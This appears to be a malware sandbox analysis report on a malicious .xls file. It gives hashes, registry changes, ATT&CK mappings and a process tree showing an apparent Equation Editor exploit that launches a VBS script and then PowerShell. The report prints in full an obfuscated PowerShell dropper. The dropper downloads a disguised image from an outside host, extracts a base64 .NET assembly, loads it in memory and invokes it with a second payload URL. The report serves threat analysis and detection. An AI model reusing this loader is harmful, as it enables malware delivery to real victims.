33234512d5289f9bfee04f9b1186805430af2caafe29a6a17be45bed3f5b12da

Analysis

max time kernel
144s
max time network
123s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 10:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

20240506_12082.xls
Size

310KB
MD5

82867f01d83d7b77d04e3c6e78d15be5
SHA1

78028bb5558df37006e71b5d783fec631249731a
SHA256

33234512d5289f9bfee04f9b1186805430af2caafe29a6a17be45bed3f5b12da
SHA512

ad0dd12169a0e256017c337179494548b071d0a509afe17d0ff985a4a669147b9f141eafe00a3d8f8cf16dd3c75c5ca34ed67e1135eef2c4cbecf9f79a656b0c
SSDEEP

6144:nqFzL5LIT47HSmC/EHmxS6hBBBqzfGgx8vXJsk3CCAz1t6oimIQ:nqFzu4LSm9HWScfsrGgx8veICCAzyoia

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/805/740/original/vbs.jpg?1719582739

exe.dropper

https://uploaddeimagens.com.br/images/004/805/740/original/vbs.jpg?1719582739

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
17	1648	EQNEDT32.EXE
18	1992	WScript.exe
20	2636	powershell.exe

Abuses OpenXML format to download file from external location

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2636	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1648	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1704	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2636	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeShutdownPrivilege	2920	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1704	EXCEL.EXE
1704	EXCEL.EXE
1704	EXCEL.EXE
2920	WINWORD.EXE
2920	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1648 wrote to memory of 1992	1648	EQNEDT32.EXE	31
PID 1648 wrote to memory of 1992	1648	EQNEDT32.EXE	31
PID 1648 wrote to memory of 1992	1648	EQNEDT32.EXE	31
PID 1648 wrote to memory of 1992	1648	EQNEDT32.EXE	31
PID 2920 wrote to memory of 1276	2920	WINWORD.EXE	32
PID 2920 wrote to memory of 1276	2920	WINWORD.EXE	32
PID 2920 wrote to memory of 1276	2920	WINWORD.EXE	32
PID 2920 wrote to memory of 1276	2920	WINWORD.EXE	32
PID 1992 wrote to memory of 2636	1992	WScript.exe	33
PID 1992 wrote to memory of 2636	1992	WScript.exe	33
PID 1992 wrote to memory of 2636	1992	WScript.exe	33
PID 1992 wrote to memory of 2636	1992	WScript.exe	33

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\20240506_12082.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1704

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2920
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1276

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1648
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bettertogetflowersimagespictu.vBS"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:1992
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $sHElLid[1]+$SHELLid[13]+'X') ( ('ej8link = y6vhttps://uploaddeimagens.com.br/images/004/805/740/original/vbs.jpg?1719582739y6v; ej8'+'webClient = New-Object System.N'+'et'+'.WebClient; try { ej8downloadedData = ej8webClient.DownloadData(ej8link) } catch { Write-Host y6vFailed To download data from ej8linky6v -ForegroundColor Red; exit '+'}; if (ej8downl'+'oadedData'+' -ne ej'+'8null) { ej8imageText = [System.Text.Encoding]::UTF8.GetString(ej8downloadedData); ej8s'+'tartFlag = y6v<<BASE64_START>>y6v; ej8end'+'Flag = y6v<<BASE64_END>>y6v; ej8startIndex = ej8imageText.IndexOf(ej8s'+'tartFlag); ej8endIndex = ej8i'+'m'+'ageText'+'.IndexOf(ej8endFlag); if (ej8startIndex -ge 0 -and ej8endIndex -gt ej8start'+'Index) { ej'+'8startIndex += ej8start'+'Flag.Length; ej8base64Length = ej8endIndex - ej8startIndex; '+'ej8base64Command = ej8imageText.Substring(ej8start'+'Index, ej8b'+'ase64Len'+'g'+'th); ej8commandBytes = [System.Convert]::FromBase64String(ej8base64Command); ej8loadedAssembly = [System.Reflection.Assembly]::Load(ej8commandBytes); ej8type = ej8loadedAssembly.GetTy'+'pe(y6vRunPE.Homey6'+'v); ej8method = ej8type.GetMethod(y6vVAIy6v).Invo'+'ke(ej8null, [object[]] (y6vtxt.MAHM/22155/831.65.232.271//:ptthy6v , y6vdesativadoy6v , y6vdesativadoy6v , y6vdesativadoy6v,y6vRegAsmy6v,y6vy6v)) } }').replaCE(([ChaR]101+[ChaR]106+[ChaR]56),[sTrING][ChaR]36).replaCE('y6v',[sTrING][ChaR]39) )"
    3⤵
    - Blocklisted process makes network request
    - Drops file in System32 directory
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
25e25ce89e6314217a90ce2ccca52f01

SHA1
b700ae160c8693d3d09cd7fe6167eecfb59fe091

SHA256
9d3856c55b78249597f0799305393e02816d164dd2e97f6ff42684c8049ef89a

SHA512
e5bce059149da7674d88569e265a1bd23605dade1e1787ce151e52ef8cd0a3fe05d7fe2ca23bb2a016fbaa5fd4ee95ce56f6394d791d19c75bba90ad39e3992e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
0c10fffd7cb6091d9691b4ac7691df75

SHA1
8ed67b632101a9efda039141414a6140337a3b97

SHA256
baf700aa896ba4871ee83059f1a9e20bf87b8714bc14839d65a38e7ecb1f50d2

SHA512
b8f0db04cf837f781b6ceed4b08bdbb7962c1d445319deb12fe1cd69ca7d9046eaf12751c91cbeb7c9a2ff939434ab5d6ab5e6e81c0f9023423e07b94c0a2135

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
bc17f6b78b4948b4489123999140bf75

SHA1
8589232c70b1b198e16501ec5c264f5a7518f6fd

SHA256
023e43642f642992b8202b31806fd6f9dca8ddae9e009b1f0f454aff44803f9b

SHA512
814aa1f5bf39bbf47c4a0dd646a72803e037bafd91c7f63fb717ab5483da9be64b7f8b5a21f06033d7d4acf8ae2a6ab933b293c1160fe498dc566b63b46e0fc4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
e854ad15646737ee3cb589aaa49b9e46

SHA1
ba509a8fdc6c8caa7c5469148bb5e567f83e242d

SHA256
86cb9bb89556614d6aaec9cb274c17152d0e8adad755d398272bf92272f225fd

SHA512
380b4736d71ed10c3723c0c28e6d43811bd358158fadb2cf62f961d86bf4f308c04129a48ab2df601ad29304fb318bc760694ed2599842fb3bde8f31d87ac89d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
a061b2074d2982a0141774b03fa77e02

SHA1
fd5585bd906e36ccaafa7fb17ccac6e171844f6d

SHA256
2b0d512d686fb4d4d6e396759a9c62aacecbccfc8f2bd39bb8923ffdc8c687ff

SHA512
8f977fac68cea7c800087acc453fd2aee78dbcfe9007ba3fe9b4be4725963f4585114f4d4db42baf6f08667904ef919740ab796c93702e4dc774355a1cffc246

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{5479E169-736E-49AE-A301-7DE4A4690A97}.FSD

Filesize
128KB

MD5
e54e8272cecf8030ba2fe5bbd57c3b12

SHA1
8d0021ae957694bc073dade749f3774703b1ceae

SHA256
74c4bf8d25f6ab240e3349952f7a5f26f2d874267e7e5b2723fd83e7d0ba899a

SHA512
64515fecb593892075fd3a928d75c47ae24dbb3a996557bd8613b9b042d5875aa2c73f127ce4dc428cfe63108936e7586206e7c5fa2abc91492affa44d1460d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5LT06Y3\dcn.cn.cn.cn.cncncn[1].doc

Filesize
199KB

MD5
43ebbcdae38676d860c97356801aca3d

SHA1
7377392abe4e0d5959b074b26709977466a8ca1e

SHA256
c27f247d5153bdb32ac33ce57d498f13cee3c9bd04daa47e59ce0e40ed192fd2

SHA512
257c58cc6796f0466e483f8813337855ca02ed5a22dcdacbe4410a504d9ddb0991a2e01fd97308d77624bd05779cdbabbe1c9487fc015c73c1d9866fd6ac34f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab7E07.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\{0A542314-8F76-4CC7-8638-628DC2AD1411}

Filesize
128KB

MD5
a266cf127daf46a2aa01454a714a9ed3

SHA1
5b2fdc2882da3860c95767b4f9987df044e04c80

SHA256
4c345309107689b1e53263d32903e0137395cd17b76cfeab4d8bacd6f3f5181d

SHA512
394787ff81d9c2d365c3f1741ed68d8767f776d04755a54f68df2dd9f2eacfba18aa4bda6aad370dc89d0180bd2c882cafcd18bc3a266e5344472fbfe7cfba9e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
6e24275c456fea882db4529e1f70005f

SHA1
ddd9dff5dbe062cade87e1841e87c03e9aab9223

SHA256
565825b37910f9f9797fba9b0d4c919436757377f390e0e8751e96c8fe89f22a

SHA512
482227971c612c431b9d93e0c71777703410ce43a1c71c1a5bfdd864fd45d88a0314d4a57a0a9ce801c662b89869a6949a575df0e81b2f64f25894b52696fb89

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\GW1TL7MW.txt

Filesize
819B

MD5
180655e3a765300ddf40c149f8044761

SHA1
f3e1a117ed28620e15d63c96141e08da8fd057d0

SHA256
